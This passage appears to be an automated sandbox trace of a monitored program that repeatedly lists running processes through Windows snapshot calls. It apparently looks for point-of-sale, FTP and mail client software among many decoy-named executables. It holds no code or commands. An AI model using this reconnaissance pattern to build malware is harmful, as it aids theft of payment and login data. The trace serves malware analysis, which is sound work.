lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0270.535] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0270.537] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0270.538] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0270.540] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0270.542] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0270.544] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0270.549] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0270.551] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0270.553] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0270.554] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0270.556] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0270.558] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0270.597] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0270.598] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0270.600] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0270.601] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0270.603] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0270.604] CloseHandle (hObject=0x9e0) returned 1 [0270.604] Sleep (dwMilliseconds=0x64) [0270.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0270.729] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.732] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0270.733] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0270.735] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.736] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0270.738] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.739] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0270.741] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0270.744] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0270.746] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.748] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.750] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0270.752] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.754] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.756] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.759] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.761] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.811] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.813] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.814] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0270.816] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0270.817] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0270.818] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.820] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0270.821] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0270.823] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0270.825] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0270.826] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.828] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0270.830] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0270.831] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0270.832] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0270.834] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0270.835] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0270.837] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0270.838] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0270.840] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0270.841] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0270.843] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0270.844] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0270.846] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0270.847] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0270.848] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0270.850] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0270.851] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0270.853] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0270.854] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0270.891] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0270.893] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0270.894] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0270.896] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0270.897] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0270.899] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0270.900] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0270.902] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0270.904] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0270.905] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0270.907] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0270.908] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0270.910] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0270.912] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0270.914] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0270.915] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0270.917] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0270.920] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0270.922] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, 